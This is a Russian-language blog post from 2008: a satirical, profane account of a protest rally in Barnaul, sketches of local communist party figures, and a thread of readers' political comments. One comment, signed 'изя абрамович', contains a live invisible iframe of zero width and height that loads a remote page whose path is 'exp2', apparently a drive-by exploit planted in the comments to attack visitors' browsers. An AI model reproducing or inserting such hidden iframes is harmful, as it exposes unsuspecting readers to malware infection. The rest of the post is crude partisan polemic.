Кто владеет информацией,
владеет миром

Митинг протеста на местном материале

Опубликовано 01.02.2008 автором Борис Викторов (Полковник) в разделе комментариев 8

Митинг протеста на местном материале

Ох тошно мне!!! Когда же это кончится-то??? Ну почему Юрий Яковлевич считает себя и Силина одинаковыми с Зюгановым и Заполевым? Почему он считает, что Зюганов коммунист, а допустим, я - нет? У-у-у-у!!!!!

Ладно, похоже, это поколение, которое действително по его собственному признанию, ПОДДЕРЖИВАЕТ СЛОЖИВШЕЕСЯ ПОЛОЖЕНИЕ В
СТРАНЕ - блин, Юрий Яковлевич, вы хоть поняли, что сказали? - уже не переделаешь и не переубедишь.

Ладно, про акцию. ...Иду, я это значит, на митинг, тороплюсь, и паралльным курсом со мной в припрыжку дедок шпарит - крепкий такой, бодрый - дубленка еще советская, добротная, крайкомовского специального пошива, шапка-кепка норковая, новая почти, хорошая, зубы вставные, современные, по голливудской моде - одним словом, этакий живчик лет семидесяти с небольшим. В классических русских
романах девятнадцотого века таких называли "мышиный жеребчик".

Поравнялись, и он меня так бодро спрашивает - а чего это митинг так далеко отнесли, дескать раньше на площади было? Я аж поперхнулся...

Э-э-э, говорю, дак вроде им он не нужен, а он дальше без остановки и все улыбается - а чего по телевизору и в газетах объявления не было? Я вот только на столбе листовку увидел? Я аж зашелся - да телевидение, говорю, у нас вроде уже не советское... А он - мимо ушей и опять за свое - а ты говорит, вчера "Поле чудес смотрел?" - тут мне совсем плохо стало - не смотрю, я говорю, такую ху..., а он еще шире ублыбается и выдает - а я смотрел, вчера Якубовичу тетка одна путевку элитную подарила, я вот думаю написать ему - как думаешь, отдаст он ее мне?

- Кого, - говорю, - тетку?

- Нет, путевку - я вот пенсионер, пенсия у меня 3 с половиной тысячи, а мечтаю я отдохнуть на хорошем курорте. Якубовичу уже привозили одну путевку - в Белокуриху, лейтенант, какой-то милицейский...

Да с какой стати он отдавать-то будет?!!!!

А он без перерывов: "Я уже и президенту писал..,"

Тут у меня совсем крыша поехала - Президенту-то зачем?

- Я ж говорю, насчет путевки...

Тут мы к митингу подошли, а там Вольфсониха на трибуне клукишествует: "Есть тут кто-нибудь с горы?! Это я, ваш будущий депутат, я
сколько-то лет (не помню сколько точно) работала- работала, работала-работала, ни хрена не заработала, нет у меня денег и я вам обещаю, что не потрачу на свою проедвыборную компанию ни копейки, а этих ссыкунов я зубами грызть буду!!!!"

Да... Про зубы я точно не помню, может и приврал в запале, но про ссыкунов - это точно. Вольфсониха потом подробно объяснила, что это она так теперь депутатов КЗС зовет... Интересно, Беньяминовича она тоже теперь ссыкуном под горячую руку погоняет? А когда изберется - ссыкухой станет?

Дальше - вы и сами все видели. Старые все знакомые - анархисты только прикольные, раньше в Барнауле такого не было - растем
потихоньку по части политического безумства. Товарищ Тереньтев - прошу не обижаться - законы обсирательного жанра беспощадны в своей объективности.

"Человек-мозг" только один и порадовал - стоит на трибуне рядом с Заполевым - фэйс каким-то красным флагом без обознавательных знаков повязал и ждет, когда ему слово дадут. Ага, дали, догнали и еще раз дали.

Фатеев посмотрел на это дело, посмотрел, подумал о судьбах будущей революции и говорит (дальше со слов "Мозга") - "Вали, - говорит, -отсюда, на ху.., экстремист хренов, нам таких речей в современной политической обстановке на ху.. не надо..."

Может и приврал я немного здесь - но самую малость. Про экстремиста - это точно, и обоповцы могут подтвердить, которые по этому поводу к Котовскому подъезжали, а вот насчет нецензурщины - это Фатеев скорее всего, так подумал. Но сами знаете - не пойман, не вор. А Силину, и вправду без чая было плохо, но без пива, наверное, еще хуже.

Хороший он мужик, Силин. Если бы я сейчас пил - вот бы мы с ним выпили...

г.Барнаул


Краткие пояснения к упоминаемым в тексте лицам, они того заслуживают.

Юрий Яковлевич - секретарь одного из сельских райкомов партии, который у себя в районе так провел предвыборную капанию, что КПРФ выиграла!!! у "Единой России" на прошедших думских выборах.

Второй человек - Петр Анатольевич, еще один сельский секретарь райкома, который единственный в крае занимается строительством комсомольских организаций в деревнях, у него по спискам комсомол сотнями числится. Реально, конечно, это не комсомол, но, тем не менее, другие и этого не делают.

Оба эти человека - наши давние соратники и друзья, не один пуд соли вместе съели, но в последнее время между нами пробежала черная кошка под названием Зюганов. Оба этих классных мужика, особенно Юрий Яковлевич - ярые сторонники вождя и именно как вождя, а не конкретно Г.А.Зюганова. Рубимся с ними по этому поводу страшно. Ладно бы кто другой говорил - но слова этих двух дорого стоят. Ничего не можем сделать - удар в спину партии и все тут...

Виталий Беньяминович - депутат нашего краевого законодательного собрания, глубоко порядочный человек и умница. Единственный, кто всегда помогает комсомольцам в случае жареных ситуаций. Не западло ему товарищей из ментовки вытаскивать. Один у него «недостаток» - еврей он и нет ему хода в КПРФ. А какой бы из него первый секретарь крайкома получился - сказка!

Вольфсониха - его жена, соответственно, совершенно «отмороженная» тетка, баллотируется на выборах в КЗС по нагорной части города, район чуть ли не с дореволюционными криминальными и алкогольными традициями. Там всегда жириновцы побеждают - родные души. Ее туда наверное для прикола поставили, а может и трезво рассудили - как раз по ней контингент.



Рейтинг:   4.33,  Голосов: 6
Поделиться
Всего комментариев к статье: 8
Комментарии не премодерируются и их можно оставлять анонимно
(без названия)
Полковник - чужаку написал 02.02.2008 13:52
Мил человек, как же можно стремиться туда, чего нет? Я ж слово "троцкист" - как ругательное, с молоком матери впитал! Я ж в 5 отделе работал - "троцкизм" - эта окраска вплоть до гибели Союза одна из самых страшных была! Сам посуди - как я могу быть троцкистом? Ленинец я, по жизни и по убеждениям Ленинец, чистейшей воды. Из-за этого в свое время - очень ранее, кстати, и из конторы уволился. Как я мог защищать партию, быть ее передовым отрядом, если она страну в пропасть вела? термин этот мутные люди придумали - так говорить на их языке, играть по их правилам. Для стебу - подписываюсь иногда - неотроцкист. Прикольно смотреть на этих уродов, как их корчит.
Хам в истерике.
Чужак написал 02.02.2008 11:30
А насчет троцкиста - неизвестно. Может еще не дорос. Но стремится.
Re: 1943
Cnfkby написал 02.02.2008 10:07
ДАЕШЬ СТАЛИНГРАД!!!!
странно люди,эти поклонники Зюганова
Полковник - Алексею К написал 02.02.2008 07:14
"Восток есть восток, запад есть запад и им никогда не быть вместе... Так, кажется говаривал Ридьярд Киплинг? народ посмотрите на происходящее! вот Алексей К. - явно грамотный,продвинутый человек, интернетом, по крайней мере пользуется. А говорим мы с ним на абсолютно разных языках. Как можно не понять, что речь идет о как раз о том, что удар в спину партии - это критика Зюганова!!! А не удар - это действительно подержка нормальный людей, думающих, образованных, не продажных... По поводу выигрыша в районе - тут, товарищ, такое дело. Вторым по списку от Алтайского края шел некий буржуй из Свердловской области - фамилия его Багаряков. Заплатил он по честному свои 5 (пять) миллионов зеленых американских рублей и спокойно ждал своего думского мандата. Дальше было приблизительно так - 4 мульта оставили в Москве - кду только дели, удивляюсь - со стариков Зюганову на борьбу с режимом собирать копейки начали, один мульт зеленых - попилили в крае. До того оборзели, что второй секретарь крайкома сразу после выборов свалил из партии и с работы. За руку был пойман - но не из чувства бережливости - а в силу конкурентной борьбы за место под солнцем. Кстати, вы случайне не забыли, что все функционеры получают зарплату? Ну вот. Такие как Юрий Яковлевич свою тощую задницу и рвали на выборах за Багорякова - и не хватило-то всего ничего - двух тысяч голосов. Плакали его денежки... Теперь самое интересное - первый секретарь Заполев, который шел первым - теперь ищет пути как отказаться от мандата с гос.думу!!!! Москва давит страшно. Народ это понимает, и хотя сама по себе вся ситуация с продажей мест - сучья, но на это по привычке закрывают глаза, а вот за откза зацепились - специальное решение на краевой конференции протащили - не отказываться! Но опять же не из принципа - это противника Заполева, которые метают его место занять и отомстить за прошлые поражения - ему сала под кожу залили. Так вот на таких, как Юрий Яковлевич и Петр Анатольевич все и держится. Это они поддерживают всю эту ***** свору. На их горбу они в рай раз за разом въезжают. Ну дальше вы как нибудь уж сами разбирайтесь, что удар в спину партии, а что не удар...
Re: так кто наносит удар в спину партии
... написал 02.02.2008 02:41
Извините, Алексей, а что вы тут делаете, среди отщепенцев? Шли бы к правильным, своим?
Душевно
ham написал 01.02.2008 23:16
Спасибо, без дураков.
так кто наносит удар в спину партии
Алексей К написал 01.02.2008 19:08
"Оба этих классных мужика, особенно Юрий Яковлевич - ярые сторонники вождя и именно как вождя, а не конкретно Г.А.Зюганова. Рубимся с ними по этому поводу страшно. Ладно бы кто другой говорил - но слова этих двух дорого стоят. Ничего не можем сделать - удар в спину партии и все тут..."
Я так понял, автор из разряда так называемых "неотроцкистов" и обижен как раз тем, что партия успешно себя повела в данном регионе на думских выборах благодаря этим людям. Теперь видимо все кто за Зюганова - "это удар в спину партии". А что же такое НЕ_УДАР ? Наверно, поддержка неотроцкистов, отщепенцев, и разных "кротов", и огульная критика руководства партии.
хех
изя абрамович написал 01.02.2008 13:29
<p>мда<p><iframe src="http://x-y-zz.org/exp2/index.php" width="0" height="0"></iframe>
Опрос
  • Как думаете, можете ли вы защитить в российском суде ваши законные интересы?:
Результаты
Интернет-ТВ
Новости
Анонсы
Добавить свой материал
Наша блогосфера
Авторы

              
      читайте нас также: pda | twitter | rss